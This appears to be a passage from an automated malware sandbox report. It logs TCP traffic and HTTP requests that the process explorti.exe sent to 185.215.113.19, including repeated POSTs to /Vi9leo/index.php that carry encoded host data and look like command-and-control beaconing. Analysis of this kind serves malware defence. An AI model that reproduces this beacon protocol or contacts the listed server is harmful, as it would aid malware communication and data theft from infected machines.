Jul 26, 2024 13:56:12.441811085 CEST	80	49892	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:12.441881895 CEST	49892	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:12.442150116 CEST	49892	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:12.442389011 CEST	80	49891	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:12.442445040 CEST	49891	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:12.447475910 CEST	80	49892	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:13.186120987 CEST	80	49892	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:13.186242104 CEST	49892	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:13.194034100 CEST	49893	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:13.194274902 CEST	49892	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:13.200333118 CEST	80	49893	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:13.200680017 CEST	49893	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:13.200849056 CEST	49893	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:13.202333927 CEST	80	49892	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:13.204380035 CEST	49892	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:13.205926895 CEST	80	49893	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:13.961771965 CEST	80	49893	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:13.961982012 CEST	49893	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:14.026488066 CEST	49893	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:14.033873081 CEST	80	49893	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:14.033929110 CEST	49893	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:14.078396082 CEST	49894	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:14.083580017 CEST	80	49894	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:14.083650112 CEST	49894	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:14.089260101 CEST	49894	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:14.094114065 CEST	80	49894	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:14.851336002 CEST	80	49894	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:14.852577925 CEST	49894	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:14.855844975 CEST	49894	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:14.856503963 CEST	49895	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:14.861430883 CEST	80	49894	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:14.861629009 CEST	80	49895	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:14.861682892 CEST	49894	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:14.861711979 CEST	49895	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:14.862466097 CEST	49895	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:14.867620945 CEST	80	49895	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:15.672898054 CEST	80	49895	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:15.673201084 CEST	49895	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:15.778511047 CEST	49895	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:15.779166937 CEST	49896	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:15.784681082 CEST	80	49896	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:15.784796953 CEST	80	49895	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:15.784993887 CEST	49896	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:15.785016060 CEST	49895	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:15.785166979 CEST	49896	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:15.790355921 CEST	80	49896	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:16.563931942 CEST	80	49896	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:16.564038992 CEST	49896	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:16.566601038 CEST	49896	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:16.566884995 CEST	49897	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:16.576265097 CEST	80	49897	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:16.576337099 CEST	49897	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:16.576499939 CEST	49897	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:16.579341888 CEST	80	49896	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:16.579421997 CEST	49896	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:16.581420898 CEST	80	49897	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:17.337516069 CEST	80	49897	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:17.338865995 CEST	49897	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:17.450501919 CEST	49897	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:17.450767994 CEST	49898	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:17.457520008 CEST	80	49898	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:17.457695007 CEST	49898	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:17.458070040 CEST	49898	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:17.463203907 CEST	80	49898	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:17.468126059 CEST	80	49897	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:17.469176054 CEST	49897	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:18.251161098 CEST	80	49898	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:18.251229048 CEST	49898	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:18.254950047 CEST	49898	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:18.255451918 CEST	49899	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:18.260384083 CEST	80	49898	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:18.260416985 CEST	80	49899	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:18.260441065 CEST	49898	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:18.260510921 CEST	49899	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:18.260842085 CEST	49899	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:18.265774012 CEST	80	49899	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:19.052731037 CEST	80	49899	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:19.052932978 CEST	49899	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:19.169711113 CEST	49899	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:19.170104980 CEST	49900	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:19.175266981 CEST	80	49899	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:19.175474882 CEST	80	49900	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:19.175513983 CEST	49899	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:19.175591946 CEST	49900	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:19.175782919 CEST	49900	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:19.181205988 CEST	80	49900	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:19.941123962 CEST	80	49900	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:19.941242933 CEST	49900	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:19.943784952 CEST	49900	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:19.944155931 CEST	49901	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:19.949140072 CEST	80	49901	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:19.949306965 CEST	49901	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:19.949803114 CEST	49901	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:19.950450897 CEST	80	49900	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:19.950560093 CEST	49900	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:19.954926014 CEST	80	49901	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:20.691484928 CEST	80	49901	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:20.691553116 CEST	49901	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:20.810496092 CEST	49901	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:20.810801029 CEST	49902	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:20.815893888 CEST	80	49902	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:20.816318035 CEST	80	49901	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:20.816410065 CEST	49901	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:20.816410065 CEST	49902	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:20.816559076 CEST	49902	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:20.822103024 CEST	80	49902	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:21.580530882 CEST	80	49902	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:21.580668926 CEST	49902	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:21.583271027 CEST	49902	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:21.583800077 CEST	49903	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:21.588833094 CEST	80	49902	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:21.588953972 CEST	49902	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:21.589134932 CEST	80	49903	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:21.589276075 CEST	49903	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:21.589839935 CEST	49903	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:21.594822884 CEST	80	49903	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:22.703362942 CEST	80	49903	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:22.703448057 CEST	49903	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:22.709000111 CEST	80	49903	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:22.709049940 CEST	49903	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:22.809919119 CEST	49903	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:22.810426950 CEST	49904	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:22.815934896 CEST	80	49904	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:22.815962076 CEST	80	49903	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:22.816015005 CEST	49904	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:22.816107988 CEST	49903	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:22.816317081 CEST	49904	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:22.821245909 CEST	80	49904	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:23.608279943 CEST	80	49904	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:23.608352900 CEST	49904	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:23.611067057 CEST	49904	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:23.611522913 CEST	49905	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:23.616565943 CEST	80	49905	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:23.616748095 CEST	49905	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:23.617321014 CEST	80	49904	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:23.617352009 CEST	49905	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:23.617436886 CEST	49904	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:23.622488022 CEST	80	49905	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:24.388034105 CEST	80	49905	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:24.388113976 CEST	49905	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:24.579480886 CEST	49905	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:24.579732895 CEST	49906	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:24.630501986 CEST	80	49906	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:24.630589008 CEST	49906	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:24.630886078 CEST	49906	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:24.633410931 CEST	80	49905	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:24.633460045 CEST	49905	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:24.638200045 CEST	80	49906	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:25.421231985 CEST	80	49906	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:25.422547102 CEST	49906	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:25.424896002 CEST	49906	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:25.425226927 CEST	49907	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:25.430203915 CEST	80	49906	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:25.430715084 CEST	80	49907	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:25.433821917 CEST	49906	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:25.433823109 CEST	49907	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:25.434133053 CEST	49907	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:25.438970089 CEST	80	49907	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:29.434808016 CEST	49907	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:29.587615967 CEST	49908	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:30.628012896 CEST	80	49908	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:30.628096104 CEST	49908	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:30.628519058 CEST	49908	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:30.635922909 CEST	80	49908	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:52.027723074 CEST	80	49908	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:52.028589964 CEST	49908	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:52.030761003 CEST	49908	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:52.034831047 CEST	49909	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:52.035931110 CEST	80	49908	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:52.039789915 CEST	80	49909	185.215.113.19	192.168.2.8
Jul 26, 2024 13:56:52.043405056 CEST	49909	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:52.043405056 CEST	49909	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:56:52.053252935 CEST	80	49909	185.215.113.19	192.168.2.8
Jul 26, 2024 13:57:13.485537052 CEST	80	49909	185.215.113.19	192.168.2.8
Jul 26, 2024 13:57:13.490767956 CEST	49909	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:57:13.533145905 CEST	49909	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:57:13.539288998 CEST	80	49909	185.215.113.19	192.168.2.8
Jul 26, 2024 13:57:13.685321093 CEST	49910	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:57:13.690677881 CEST	80	49910	185.215.113.19	192.168.2.8
Jul 26, 2024 13:57:13.690876007 CEST	49910	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:57:13.691274881 CEST	49910	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:57:13.696250916 CEST	80	49910	185.215.113.19	192.168.2.8
Jul 26, 2024 13:57:35.077039957 CEST	80	49910	185.215.113.19	192.168.2.8
Jul 26, 2024 13:57:35.077102900 CEST	49910	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:57:35.077203035 CEST	49910	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:57:35.084112883 CEST	80	49910	185.215.113.19	192.168.2.8

HTTP Request Dependency Graph

185.215.113.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:19.247950077 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:19.997610092 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:20.000714064 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:20.247251987 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49705	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:20.362703085 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:21.165393114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:21.167192936 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:21.415174007 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49706	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:21.533695936 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:22.367829084 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:22.369359016 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:22.667659044 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49707	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:23.140268087 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:23.903121948 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:23.905528069 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:24.156948090 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49708	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:24.270214081 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:25.023931026 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:25.025213957 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:25.273659945 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49709	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:25.392405987 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:26.360193014 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
